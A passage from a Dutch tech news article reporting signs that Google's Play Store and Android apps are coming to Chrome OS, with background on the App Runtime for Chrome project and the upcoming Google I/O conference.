Het onderdeel 'Android Apps' verscheen echter maar een seconde, om daarna weer te verdwijnen. In de broncode werden daarna verdere aanwijzingen gevonden. Google heeft de integratie van de Play Store met Chrome OS nog niet aangekondigd, maar 18 mei start Google I/O, de ontwikkelaarsconferentie van Google, waar het bedrijf traditiegetrouw aankondigingen over Android en Chrome OS doet.

Feitelijk kondigde Google de komst van Android-apps naar Chrome OS al in 2014 aan. Het was echter al geruime tijd stil rond het project voor de App Runtime for Chrome, of ARC, en slechts enkele apps vonden hun weg naar de Chrome Web Store. De komst van de Play Store naar Chrome OS kan dat besturingssysteem aantrekkelijker maken en bijvoorbeeld een impuls betekenen voor Chromebooks met touchscreens.

Chrome S Play Store

Reacties (78)